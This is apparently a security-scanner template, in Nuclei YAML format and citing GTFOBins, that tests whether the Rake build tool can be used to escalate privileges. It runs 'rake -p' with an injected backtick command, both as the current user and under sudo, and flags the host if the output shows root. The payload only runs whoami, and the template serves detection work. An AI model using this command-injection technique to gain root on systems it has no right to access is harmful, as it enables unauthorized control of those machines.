id: privesc-rake

info:
  name: Rake - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    Rake is a build automation tool written in Ruby. It is similar to Make, Ant, or MSBuild, but uses a Ruby syntax. Rake is often used for automating tasks in software development, such as building, testing, and deploying applications.
  reference:
    - https://gtfobins.github.io/gtfobins/rake/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,rake,privesc

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      rake -p '`whoami 1>&0`'

  - engine:
      - sh
      - bash
    source: |
      sudo rake -p '`whoami 1>&0`'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022020a2a635c25e2c0f1ccfe1074d1ab852e755aed1574801e768ca8ca700afef4f022100d15cbbcb232d6324782fcba55dd473bb213c7bb4a27e709633f1fb868aacbb14:922c64590222798bb761d5b6d8e72950